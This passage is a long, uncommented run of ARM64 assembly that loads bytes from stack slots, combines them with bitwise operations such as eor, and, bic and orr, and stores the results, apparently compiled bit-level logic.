w8, [sp, #1097] ldrb w9, [sp, #1096] eor w8, w8, w9 strb w8, [sp, #330] ldrb w8, [sp, #1097] ldrb w9, [sp, #1096] and w8, w8, w9 strb w8, [sp, #747] ldrb w8, [sp, #946] ldrb w9, [sp, #945] eor w8, w8, w9 strb w8, [sp, #737] ldrb w8, [sp, #946] ldrb w9, [sp, #945] and w8, w8, w9 strb w8, [sp, #576] ldrb w8, [sp, #572] ldrb w9, [sp, #573] eor w8, w8, w9 strb w8, [sp, #570] ldrb w8, [sp, #572] ldrb w9, [sp, #573] and w8, w8, w9 strb w8, [sp, #95] ldrb w8, [sp, #418] ldrb w9, [sp, #419] eor w8, w8, w9 strb w8, [sp, #109] ldrb w8, [sp, #418] ldrb w9, [sp, #419] and w8, w8, w9 strb w8, [sp, #244] ldrb w8, [sp, #295] ldrb w9, [sp, #294] eor w8, w8, w9 strb w8, [sp, #297] ldrb w8, [sp, #295] ldrb w9, [sp, #294] and w8, w8, w9 strb w8, [sp, #874] ldrb w8, [sp, #840] ldrb w9, [sp, #839] eor w8, w8, w9 strb w8, [sp, #842] ldrb w8, [sp, #840] ldrb w9, [sp, #839] and w8, w8, w9 strb w8, [sp, #194] ldrb w8, [sp, #1138] ldrb w9, [sp, #1137] eor w8, w8, w9 strb w8, [sp, #239] ldrb w8, [sp, #1138] ldrb w9, [sp, #1137] and w8, w8, w9 strb w8, [sp, #131] ldrb w8, [sp, #802] ldrb w9, [sp, #132] eon w8, w8, w9 strb w8, [sp, #133] ldrb w8, [sp, #802] ldrb w9, [sp, #132] bic w8, w8, w9 strb w8, [sp, #1100] ldrb w8, [sp, #187] ldrb w9, [sp, #794] and w8, w8, w9 strb w8, [sp, #186] ldrb w8, [sp, #1083] ldrb w9, [sp, #1084] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #1085] ldrb w8, [sp, #1095] ldrb w9, [sp, #328] and w8, w8, w9 strb w8, [sp, #52] ldrb w8, [sp, #1086] ldrb w9, [sp, #187] eor w8, w8, w9 strb w8, [sp, #1087] ldrh w8, [sp, #1244] asr w8, w8, #15 and w8, w8, #0x1 ldrb w9, [sp, #391] bic w8, w8, w9 strb w8, [sp, #390] ldrh w8, [sp, #1246] asr w8, w8, #5 and w8, w8, #0x1 ldrb w9, [sp, #328] and w8, w8, w9 strb w8, [sp, #392] ldrb w8, [sp, #1086] ldrb w9, [sp, #187] and w8, w8, w9 strb w8, [sp, #877] ldrb w8, [sp, #823] ldrb w9, [sp, #824] eor w8, w8, w9 strb w8, [sp, #1181] ldrb w8, [sp, #1085] ldrb w9, [sp, #186] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #326] ldrb w8, [sp, #847] ldrb w9, [sp, #877] and w8, w8, w9 strb w8, [sp, #16] ldrb w8, [sp, #847] ldrb w9, [sp, #1181] and w8, w8, w9 strb w8, [sp, #17] ldrb w8, [sp, #1181] ldrb w9, [sp, #877] and w8, w8, w9 strb w8, [sp, #18] ldrb w8, [sp, #352] ldrb w9, [sp, #9] eon w8, w8, w9 strb w8, [sp, #8] ldrb w8, [sp, #352] ldrb w9, [sp, #9] and w8, w8, w9 strb w8, [sp, #889] ldrb w8, [sp, #352] ldrb w9, [sp, #351] and w8, w8, w9 strb w8, [sp, #888] ldrb w8, [sp, #351] ldrb w9, [sp, #9] and w8, w8, w9 strb w8, [sp, #891] ldrb w8, [sp, #1094] ldrb w9, [sp, #886] eon w8, w8, w9 strb w8, [sp, #887] ldrb w8, [sp, #1094] ldrb w9, [sp, #886] and w8, w8, w9 strb w8, [sp, #744] ldrb w8, [sp, #1094] ldrb w9, [sp, #330] and w8, w8, w9 strb w8, [sp, #743] ldrb w8, [sp, #330] ldrb w9, [sp, #886] and w8, w8, w9 strb w8, [sp, #746] ldrb w8, [sp, #738] ldrb w9, [sp, #747] eon w8, w8, w9 strb w8, [sp, #748] ldrb w8, [sp, #738] ldrb w9, [sp, #747] and w8, w8, w9 strb w8, [sp, #939] ldrb w8, [sp, #738] ldrb w9, [sp, #737] and w8, w8, w9 strb w8, [sp, #940] ldrb w8, [sp, #737] ldrb w9, [sp, #747] and w8, w8, w9 strb w8, [sp, #575] ldrb w8, [sp, #571] ldrb w9, [sp, #576] eon w8, w8, w9 strb w8, [sp, #577] ldrb w8, [sp, #571] ldrb w9, [sp, #576] and w8, w8, w9 strb w8, [sp, #98] ldrb w8, [sp, #571] ldrb w9, [sp, #570] and w8, w8, w9 strb w8, [sp, #99] ldrb w8, [sp, #570] ldrb w9, [sp, #576] and w8, w8, w9 strb w8, [sp, #96] ldrb w8, [sp, #108] ldrb w9, [sp, #95] eon w8, w8, w9 strb w8, [sp, #94] ldrb w8, [sp, #108] ldrb w9, [sp, #95] and w8, w8, w9 strb w8, [sp, #242] ldrb w8, [sp, #108] ldrb w9, [sp, #109] and w8, w8, w9 strb w8, [sp, #241] ldrb w8, [sp, #109] ldrb w9, [sp, #95] and w8, w8, w9 strb w8, [sp, #180] ldrb w8, [sp, #296] ldrb w9, [sp, #244] eon w8, w8, w9 strb w8, [sp, #245] ldrb w8, [sp, #296] ldrb w9, [sp, #244] and w8, w8, w9 strb w8, [sp, #1180] ldrb w8, [sp, #296] ldrb w9, [sp, #297] and w8, w8, w9 strb w8, [sp, #1179] ldrb w8, [sp, #297] ldrb w9, [sp, #244] and w8, w8, w9 strb w8, [sp, #850] ldrb w8, [sp, #841] ldrb w9, [sp, #874] eon w8, w8, w9 strb w8, [sp, #1191] ldrb w8, [sp, #841] ldrb w9, [sp, #874] and w8, w8, w9 strb w8, [sp, #249] ldrb w8, [sp, #841] ldrb w9, [sp, #842] and w8, w8, w9 strb w8, [sp, #248] ldrb w8, [sp, #842] ldrb w9, [sp, #874] and w8, w8, w9 strb w8, [sp, #191] ldrb w8, [sp, #240] ldrb w9, [sp, #194] eon w8, w8, w9 strb w8, [sp, #200] ldrb w8, [sp, #240] ldrb w9, [sp, #194] and w8, w8, w9 strb w8, [sp, #1041] ldrb w8, [sp, #240] ldrb w9, [sp, #239] and w8, w8, w9 strb w8, [sp, #135] ldrb w8, [sp, #239] ldrb w9, [sp, #194] and w8, w8, w9 strb w8, [sp, #134] ldrb w8, [sp, #130] ldrb w9, [sp, #131] eon w8, w8, w9 strb w8, [sp, #136] ldrb w8, [sp, #130] ldrb w9, [sp, #131] and w8, w8, w9 strb w8, [sp, #1105] ldrb w8, [sp, #130] ldrb w9, [sp, #133] and w8, w8, w9 strb w8, [sp, #1104] ldrb w8, [sp, #133] ldrb w9, [sp, #131] and w8, w8, w9 strb w8, [sp, #1099] ldrb w8, [sp, #1095] ldrb w9, [sp, #1100] eon w8, w8, w9 strb w8, [sp, #1101] ldrb w8, [sp, #1088] ldrb w9, [sp, #186] eon w8, w8, w9 strb w8, [sp, #1089] ldrb w8, [sp, #1095] ldrb w9, [sp, #1100] and w8, w8, w9 strb w8, [sp, #53] ldrb w8, [sp, #328] ldrb w9, [sp, #1100] and w8, w8, w9 strb w8, [sp, #47] ldrb w9, [sp, #392] ldrb w8, [sp, #390] bic w8, w8, w9 strb w8, [sp, #389] ldrb w8, [sp, #1088] ldrb w9, [sp, #186] and w8, w8, w9 strb w8, [sp, #1186] ldrb w8, [sp, #1088] ldrb w9, [sp, #1087] and w8, w8, w9 strb w8, [sp, #1187] ldrb w8, [sp, #1087] ldrb w9, [sp, #186] and w8, w8, w9 strb w8, [sp, #1192] ldrb w8, [sp, #758] ldrb w9, [sp, #390] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #27] ldrh w8, [sp, #1246] asr w8, w8, #6 and w8, w8, #0x1 ldrb w9, [sp, #390] and w8, w8, w9 strb w8, [sp, #25] ldrb w8, [sp, #847] ldrb w9, [sp, #877] eon w8, w8, w9 strb w8, [sp, #1190] ldrb w8, [sp, #1087] ldrb w9, [sp, #1089] eon w8, w8, w9 strb w8, [sp, #1046] ldrb w9, [sp, #1093] ldrb w8, [sp, #27] bic w8, w8, w9 strb w8, [sp, #819] ldrb w8, [sp, #17] ldrb w9, [sp, #16] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #15] ldrb w8, [sp, #351] ldrb w9, [sp, #8] eor w8, w8, w9 strb w8, [sp, #19] ldrb w8, [sp, #888] ldrb w9, [sp, #889] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #894] ldrb w8, [sp, #330] ldrb w9, [sp, #887] eor w8, w8, w9 strb w8, [sp, #890] ldrb w8, [sp, #743] ldrb w9, [sp, #744] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #741] ldrb w8, [sp, #737] ldrb w9, [sp, #748] eor w8, w8, w9 strb w8, [sp, #745] ldrb w8, [sp, #940] ldrb w9, [sp, #939] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #938] ldrb w8, [sp, #570] ldrb w9, [sp, #577] eor w8, w8, w9 strb w8, [sp, #574] ldrb w8, [sp, #99] ldrb w9, [sp, #98] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #101] ldrb w8, [sp, #109] ldrb w9, [sp, #94] eor w8, w8, w9 strb w8, [sp, #97] ldrb w8, [sp, #241] ldrb w9, [sp, #242] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #235] ldrb w8, [sp, #297] ldrb w9, [sp, #245] eor w8, w8, w9 strb w8, [sp, #177] ldrb w8, [sp, #1179] ldrb w9, [sp, #1180] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #1184] ldrb w8, [sp, #842] ldrb w9, [sp, #1191] eor w8, w8, w9 strb w8, [sp, #1120] ldrb w8, [sp, #248] ldrb w9, [sp, #249] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #246] ldrb w8, [sp, #239] ldrb w9, [sp, #200] eor w8, w8, w9 strb w8, [sp, #243] ldrb w8, [sp, #135] ldrb w9, [sp, #1041] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #1040] ldrb w8, [sp, #133] ldrb w9, [sp, #136] eor w8, w8, w9 strb w8, [sp, #137] ldrb w8, [sp, #1104] ldrb w9, [sp, #1105] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #353] ldrb w8, [sp, #328] ldrb w9, [sp, #1101] eor w8, w8, w9 strb w8, [sp, #1098] ldrb w8, [sp, #52] ldrb w9, [sp, #53] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #50] ldrb w8, [sp, #1187] ldrb w9, [sp, #1186] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #1189] ldrb w8, [sp, #46] ldrb w9, [sp, #389] and w8, w8, w9 strb w8, [sp, #370] ldrb w8, [sp, #25] ldrb w9, [sp, #27] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #363] ldrb w8, [sp, #1181] ldrb w9, [sp, #1190] eor w8, w8, w9 strb w8, [sp, #1193] ldrb w8, [sp, #1093] ldrb w9, [sp, #27] eon w8, w8, w9 strb w8, [sp, #321] ldrb w9, [sp, #826] ldrb w8, [sp, #819] bic w8, w8, w9 strb w8, [sp, #820] ldrh w8, [sp, #1246] asr w8, w8, #8 and w8, w8, #0x1 ldrb w9, [sp, #819] bic w8, w8, w9 strb w8, [sp, #825] ldrb w9, [sp, #18] ldrb w8, [sp, #15] bic w8, w8, w9 strb w8, [sp, #14] ldrb w8, [sp, #355] ldrb w9, [sp, #19] bic w8, w8, w9 strb w8, [sp, #530] ldrb w9, [sp, #891] ldrb w8, [sp, #894] bic w8, w8, w9 strb w8, [sp, #895] ldrb w8, [sp, #1090] ldrb w9, [sp, #890] bic w8, w8, w9 strb w8, [sp, #403] ldrb w9, [sp, #746] ldrb w8, [sp, #741] bic w8, w8, w9 strb w8, [sp, #742] ldrb w8, [sp, #947] ldrb w9, [sp, #745] bic w8, w8, w9 strb w8, [sp, #933] ldrb w9, [sp, #575] ldrb w8, [sp, #938] bic w8, w8, w9 strb w8, [sp, #937] ldrb w8, [sp, #581] ldrb w9, [sp, #574] bic w8, w8, w9 strb w8, [sp, #433] ldrb w9, [sp, #96] ldrb w8, [sp, #101] bic w8, w8, w9 strb w8, [sp, #100] ldrb w8, [sp, #417] ldrb w9, [sp, #97] bic w8, w8, w9 strb w8, [sp, #1143] ldrb w9, [sp, #180] ldrb w8, [sp, #235] bic w8, w8, w9 strb w8, [sp, #236] ldrb w8, [sp, #292] ldrb w9, [sp, #177] bic w8, w8, w9 strb w8, [sp, #1166] ldrb w9, [sp, #850] ldrb w8, [sp, #1184] bic w8, w8, w9 strb w8, [sp, #1185] ldrb w8, [sp, #845] ldrb w9, [sp, #1120] bic w8, w8, w9 strb w8, [sp, #152] ldrb w9, [sp, #191] ldrb w8, [sp, #246] bic w8, w8, w9 strb w8, [sp, #247] ldrb w8, [sp, #1135] ldrb w9, [sp, #243] bic w8, w8, w9 strb w8, [sp, #1047] ldrb w9, [sp, #134] ldrb w8, [sp, #1040] bic w8, w8, w9 strb w8, [sp, #1051] ldrb w8, [sp, #140] ldrb w9, [sp, #137] bic w8, w8, w9 strb w8, [sp, #208] ldrb w9, [sp, #1099] ldrb w8, [sp, #353] bic w8, w8, w9 strb w8, [sp, #1103] ldrb w8, [sp, #723] ldrb w9, [sp, #1098] bic w8, w8, w9 strb w8, [sp, #942] ldrb w9, [sp, #47] ldrb w8, [sp, #50] bic w8, w8, w9 strb w8, [sp, #51] ldrb w9, [sp, #1192] ldrb w8, [sp, #1189] bic w8, w8, w9 strb w8, [sp, #1188] ldrb w8, [sp, #364] ldrb w9, [sp, #363] and w8, w8, w9 strb w8, [sp, #1102] ldrb w8, [sp, #848] ldrb w9, [sp, #1193] bic w8, w8, w9 strb w8, [sp, #830] ldrb w8, [sp, #273] ldrb w9, [sp, #321] and w8, w8, w9 strb w8, [sp, #28] ldrb w8, [sp, #825] ldrb w9, [sp, #820] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #821] ldrb w8, [sp, #19] ldrb w9, [sp, #14] eon w8, w8, w9 strb w8, [sp, #13] ldrb w8, [sp, #761] ldrb w9, [sp, #820] eon w8, w8, w9 strb w8, [sp, #751] ldrb w9, [sp, #761] ldrb w8, [sp, #820] bic w8, w8, w9 strb w8, [sp, #998] ldrb w8, [sp, #19] ldrb w9, [sp, #14] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #525] ldrb w8, [sp, #355] ldrb w9, [sp, #14] bic w8, w8, w9 strb w8, [sp, #531] ldrb w8, [sp, #890] ldrb w9, [sp, #895] eon w8, w8, w9 strb w8, [sp, #892] ldrb w8, [sp, #890] ldrb w9, [sp, #895] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #406] ldrb w8, [sp, #1090] ldrb w9, [sp, #895] bic w8, w8, w9 strb w8, [sp, #404] ldrb w8, [sp, #745] ldrb w9, [sp, #742] eon w8, w8, w9 strb w8, [sp, #402] ldrb w8, [sp, #745] ldrb w9, [sp, #742] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #932] ldrb w8, [sp, #947] ldrb w9, [sp, #742] bic w8, w8, w9 strb w8, [sp, #934] ldrb w8, [sp, #574] ldrb w9, [sp, #937] eon w8, w8, w9 strb w8, [sp, #936] ldrb w8, [sp, #574] ldrb w9, [sp, #937] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #430] ldrb w8, [sp, #581] ldrb w9, [sp, #937] bic w8, w8, w9 strb w8, [sp, #432] ldrb w8, [sp, #97] ldrb w9, [sp, #100] eon w8, w8, w9 strb w8, [sp, #434] ldrb w8, [sp, #97] ldrb w9, [sp, #100] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #556] ldrb w8, [sp, #417] ldrb w9, [sp, #100] bic w8, w8, w9 strb w8, [sp, #1144] ldrb w8, [sp, #177] ldrb w9, [sp, #236] eon w8, w8, w9 strb w8, [sp, #237] ldrb w8, [sp, #177] ldrb w9, [sp, #236] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #1169] ldrb w8, [sp, #292] ldrb w9, [sp, #236] bic w8, w8, w9 strb w8, [sp, #1165] ldrb w8, [sp, #1120] ldrb w9, [sp, #1185] eon w8, w8, w9 strb w8, [sp, #1182] ldrb w8, [sp, #1120] ldrb w9, [sp, #1185] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #151] ldrb w8, [sp, #845] ldrb w9, [sp, #1185] bic w8, w8, w9 strb w8, [sp, #153] ldrb w8, [sp, #243] ldrb w9, [sp, #247] eon w8, w8, w9 strb w8, [sp, #147] ldrb w8, [sp, #243] ldrb w9, [sp, #247] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #1234] ldrb w8, [sp, #1135] ldrb w9, [sp, #247] bic w8, w8, w9 strb w8, [sp, #1052] ldrb w8, [sp, #137] ldrb w9, [sp, #1051] eon w8, w8, w9 strb w8, [sp, #1050] ldrb w8, [sp, #137] ldrb w9, [sp, #1051] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #207] ldrb w8, [sp, #140] ldrb w9, [sp, #1051] bic w8, w8, w9 strb w8, [sp, #209] ldrb w8, [sp, #1098] ldrb w9, [sp, #1103] eon w8, w8, w9 strb w8, [sp, #195] ldrb w8, [sp, #1098] ldrb w9, [sp, #1103] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #941] ldrb w8, [sp, #723] ldrb w9, [sp, #1103] bic w8, w8, w9 strb w8, [sp, #55] ldrb w8, [sp, #46] ldrb w9, [sp, #51] eor w8, w8, w9 strb w8, [sp, #56] ldrb w8, [sp, #1193] ldrb w9, [sp, #1188] eon w8, w8, w9 strb w8, [sp, #1082] ldrb w8, [sp, #46] ldrb w9, [sp, #51] bic w8, w8, w9 strb w8, [sp, #367] ldrb w8, [sp, #389] ldrb w9, [sp, #51] bic w8, w8, w9 strb w8, [sp, #369] ldrb w8, [sp, #1193] ldrb w9, [sp, #1188] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #1232] ldrb w8, [sp, #848] ldrb w9, [sp, #1188] bic w8, w8, w9 strb w8, [sp, #829] ldrb w8, [sp, #848] ldrb w9, [sp, #1082] eon w8, w8, w9 strb w8, [sp, #762] ldrb w8, [sp, #355] ldrb w9, [sp, #13] eor w8, w8, w9 strb w8, [sp, #12] ldrb w8, [sp, #822] ldrb w9, [sp, #821] and w8, w8, w9 strb w8, [sp, #776] ldrb w8, [sp, #755] ldrb w9, [sp, #751] and w8, w8, w9 strb w8, [sp, #506] ldrb w9, [sp, #999] ldrb w8, [sp, #998] bic w8, w8, w9 strb w8, [sp, #1005] ldrh w8, [sp, #1246] asr w8, w8, #10 and w8, w8, #0x1 ldrb w9, [sp, #998] bic w8, w8, w9 strb w8, [sp, #1000] ldrb w8, [sp, #530] ldrb w9, [sp, #525] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #524] ldrb w8, [sp, #1090] ldrb w9, [sp, #892] eor w8, w8, w9 strb w8, [sp, #893] ldrb w8, [sp, #403] ldrb w9, [sp, #406] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #405] ldrb w8, [sp, #947] ldrb w9, [sp, #402] eor w8, w8, w9 strb w8, [sp, #401] ldrb w8, [sp, #933] ldrb w9, [sp, #932] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #931] ldrb w8, [sp, #581] ldrb w9, [sp, #936] eor w8, w8, w9 strb w8, [sp, #935] ldrb w8, [sp, #433] ldrb w9, [sp, #430] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #431] ldrb w8, [sp, #417] ldrb w9, [sp, #434] eor w8, w8, w9 strb w8, [sp, #435] ldrb w8, [sp, #1143] ldrb w9, [sp, #556] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #552] ldrb w8, [sp, #292] ldrb w9, [sp, #237] eor w8, w8, w9 strb w8, [sp, #238] ldrb w8, [sp, #1166] ldrb w9, [sp, #1169] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #1170] ldrb w8, [sp, #845] ldrb w9, [sp, #1182] eor w8, w8, w9 strb w8, [sp, #1183] ldrb w8, [sp, #152] ldrb w9, [sp, #151] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #150] ldrb w8, [sp, #1135] ldrb w9, [sp, #147] eor w8, w8, w9 strb w8, [sp, #146] ldrb w8, [sp, #1047] ldrb w9, [sp, #1234] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #1049] ldrb w8, [sp, #140] ldrb w9, [sp, #1050] eor w8, w8, w9 strb w8, [sp, #1053] ldrb w8, [sp, #208] ldrb w9, [sp, #207] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #206] ldrb w8, [sp, #723] ldrb w9, [sp, #195] eor w8, w8, w9 strb w8, [sp, #1176] ldrb w8, [sp, #942] ldrb w9, [sp, #941] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #641] ldrb w8, [sp, #389] ldrb w9, [sp, #56] eor w8, w8, w9 strb w8, [sp, #57] ldrb w8, [sp, #370] ldrb w9, [sp, #367] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #368] ldrb w8, [sp, #830] ldrb w9, [sp, #1232] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #1235] ldrb w8, [sp, #1000] ldrb w9, [sp, #1005] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #1004] ldrb w8, [sp, #486] ldrb w9, [sp, #1005] eon w8, w8, w9 strb w8, [sp, #487] ldrb w9, [sp, #486] ldrb w8, [sp, #1005] bic w8, w8, w9 strb w8, [sp, #701] ldrb w8, [sp, #354] ldrb w9, [sp, #12] bic w8, w8, w9 strb w8, [sp, #520] ldrb w9, [sp, #531] ldrb w8, [sp, #524] bic w8, w8, w9 strb w8, [sp, #527] ldrb w8, [sp, #1091] ldrb w9, [sp, #893] bic w8, w8, w9 strb w8, [sp, #409] ldrb w9, [sp, #404] ldrb w8, [sp, #405] bic w8, w8, w9 strb w8, [sp, #408] ldrb w8, [sp, #948] ldrb w9, [sp, #401] bic w8, w8, w9 strb w8, [sp, #262] ldrb w9, [sp, #934] ldrb w8, [sp, #931] bic w8, w8, w9 strb w8, [sp, #282] ldrb w8, [sp, #580] ldrb w9, [sp, #935] bic w8, w8, w9 strb w8, [sp, #427] ldrb w9, [sp, #432] ldrb w8, [sp, #431] bic w8, w8, w9 strb w8, [sp, #428] ldrb w8, [sp, #416] ldrb w9, [sp, #435] bic w8, w8, w9 strb w8, [sp, #536] ldrb w9, [sp, #1144] ldrb w8, [sp, #552] bic w8, w8, w9 strb w8, [sp, #546] ldrb w8, [sp, #293] ldrb w9, [sp, #238] bic w8, w8, w9 strb w8, [sp, #1174] ldrb w9, [sp, #1165] ldrb w8, [sp, #1170] bic w8, w8, w9 strb w8, [sp, #1167] ldrb w8, [sp, #846] ldrb w9, [sp, #1183] bic w8, w8, w9 strb w8, [sp, #154] ldrb w9, [sp, #153] ldrb w8, [sp, #150] bic w8, w8, w9 strb w8, [sp, #157] ldrb w8, [sp, #1136] ldrb w9, [sp, #146] bic w8, w8, w9 strb w8, [sp, #214] ldrb w9, [sp, #1052] ldrb w8, [sp, #1049] bic w8, w8, w9 strb w8, [sp, #1048] ldrb w8, [sp, #616] ldrb w9, [sp, #1053] bic w8, w8, w9 strb w8, [sp, #202] ldrb w9, [sp, #209] ldrb w8, [sp, #206] bic w8, w8, w9 strb w8, [sp, #205] ldrb w8, [sp, #724] ldrb w9, [sp, #1176] bic w8, w8, w9 strb w8, [sp, #620] ldrb w9, [sp, #55] ldrb w8, [sp, #641] bic w8, w8, w9 strb w8, [sp, #636] ldrb w8, [sp, #54] ldrb w9, [sp, #57] bic w8, w8, w9 strb w8, [sp, #554] ldrb w9, [sp, #369] ldrb w8, [sp, #368] bic w8, w8, w9 strb w8, [sp, #373] ldrb w9, [sp, #829] ldrb w8, [sp, #1235] bic w8, w8, w9 strb w8, [sp, #1222] ldrb w8, [sp, #1003] ldrb w9, [sp, #1004] and w8, w8, w9 strb w8, [sp, #831] ldrb w8, [sp, #12] ldrb w9, [sp, #1222] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #522] ldrb w8, [sp, #485] ldrb w9, [sp, #487] and w8, w8, w9 strb w8, [sp, #277] ldrb w8, [sp, #354] ldrb w9, [sp, #1222] bic w8, w8, w9 strb w8, [sp, #523] ldrb w9, [sp, #705] ldrb w8, [sp, #701] bic w8, w8, w9 strb w8, [sp, #978] ldrh w8, [sp, #1246] asr w8, w8, #12 and w8, w8, #0x1 ldrb w9, [sp, #701] bic w8, w8, w9 strb w8, [sp, #706] ldrb w8, [sp, #893] ldrb w9, [sp, #527] eon w8, w8, w9 strb w8, [sp, #526] ldrb w8, [sp, #893] ldrb w9, [sp, #527] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #1216] ldrb w8, [sp, #1091] ldrb w9, [sp, #527] bic w8, w8, w9 strb w8, [sp, #1212] ldrb w8, [sp, #401] ldrb w9, [sp, #408] eon w8, w8, w9 strb w8, [sp, #407] ldrb w8, [sp, #401] ldrb w9, [sp, #408] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #49] ldrb w8, [sp, #948] ldrb w9, [sp, #408] bic w8, w8, w9 strb w8, [sp, #48] ldrb w8, [sp, #935] ldrb w9, [sp, #282] eon w8, w8, w9 strb w8, [sp, #285] ldrb w8, [sp, #935] ldrb w9, [sp, #282] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #782] ldrb w8, [sp, #580] ldrb w9, [sp, #282] bic w8, w8, w9 strb w8, [sp, #783] ldrb w8, [sp, #435] ldrb w9, [sp, #428] eon w8, w8, w9 strb w8, [sp, #429] ldrb w8, [sp, #435] ldrb w9, [sp, #428] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #20] ldrb w8, [sp, #416] ldrb w9, [sp, #428] bic w8, w8, w9 strb w8, [sp, #40] ldrb w8, [sp, #238] ldrb w9, [sp, #546] eon w8, w8, w9 strb w8, [sp, #542] ldrb w8, [sp, #238] ldrb w9, [sp, #546] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #1172] ldrb w8, [sp, #293] ldrb w9, [sp, #546] bic w8, w8, w9 strb w8, [sp, #1171] ldrb w8, [sp, #1183] ldrb w9, [sp, #1167] eon w8, w8, w9 strb w8, [sp, #1168] ldrb w8, [sp, #1183] ldrb w9, [sp, #1167] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #479] ldrb w8, [sp, #846] ldrb w9, [sp, #1167] bic w8, w8, w9 strb w8, [sp, #478] ldrb w8, [sp, #146] ldrb w9, [sp, #157] eon w8, w8, w9 strb w8, [sp, #156] ldrb w8, [sp, #146] ldrb w9, [sp, #157] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #253] ldrb w8, [sp, #1136] ldrb w9, [sp, #157] bic w8, w8, w9 strb w8, [sp, #220] ldrb w8, [sp, #1053] ldrb w9, [sp, #1048] eon w8, w8, w9 strb w8, [sp, #320] ldrb w8, [sp, #1053] ldrb w9, [sp, #1048] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #784] ldrb w8, [sp, #616] ldrb w9, [sp, #1048] bic w8, w8, w9 strb w8, [sp, #781] ldrb w8, [sp, #1176] ldrb w9, [sp, #205] eon w8, w8, w9 strb w8, [sp, #204] ldrb w8, [sp, #1176] ldrb w9, [sp, #205] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #630] ldrb w8, [sp, #724] ldrb w9, [sp, #205] bic w8, w8, w9 strb w8, [sp, #814] ldrb w8, [sp, #54] ldrb w9, [sp, #636] eor w8, w8, w9 strb w8, [sp, #647] ldrb w8, [sp, #54] ldrb w9, [sp, #636] bic w8, w8, w9 strb w8, [sp, #547] ldrb w8, [sp, #57] ldrb w9, [sp, #636] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #555] ldrb w8, [sp, #364] ldrb w9, [sp, #373] eor w8, w8, w9 strb w8, [sp, #374] ldrb w8, [sp, #364] ldrb w9, [sp, #373] bic w8, w8, w9 strb w8, [sp, #358] ldrb w8, [sp, #363] ldrb w9, [sp, #373] bic w8, w8, w9 strb w8, [sp, #356] ldrb w8, [sp, #12] ldrb w9, [sp, #1222] eon w8, w8, w9 strb w8, [sp, #1228] ldrb w8, [sp, #354] ldrb w9, [sp, #1228] eon w8, w8, w9 strb w8, [sp, #162] ldrb w8, [sp, #523] ldrb w9, [sp, #522] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #346] ldrb w8, [sp, #706] ldrb w9, [sp, #978] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #703] ldrb w8, [sp, #1091] ldrb w9, [sp, #526] eor w8, w8, w9 strb w8, [sp, #521] ldrb w8, [sp, #228] ldrb w9, [sp, #978] eon w8, w8, w9 strb w8, [sp, #233] ldrb w9, [sp, #228] ldrb w8, [sp, #978] bic w8, w8, w9 strb w8, [sp, #767] ldrb w8, [sp, #1212] ldrb w9, [sp, #1216] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #533] ldrb w8, [sp, #948] ldrb w9, [sp, #407] eor w8, w8, w9 strb w8, [sp, #410] ldrb w8, [sp, #48] ldrb w9, [sp, #49] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #42] ldrb w8, [sp, #580] ldrb w9, [sp, #285] eor w8, w8, w9 strb w8, [sp, #257] ldrb w8, [sp, #783] ldrb w9, [sp, #782] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #789] ldrb w8, [sp, #416] ldrb w9, [sp, #429] eor w8, w8, w9 strb w8, [sp, #426] ldrb w8, [sp, #40] ldrb w9, [sp, #20] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #778] ldrb w8, [sp, #293] ldrb w9, [sp, #542] eor w8, w8, w9 strb w8, [sp, #539] ldrb w8, [sp, #1171] ldrb w9, [sp, #1172] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #810] ldrb w8, [sp, #846] ldrb 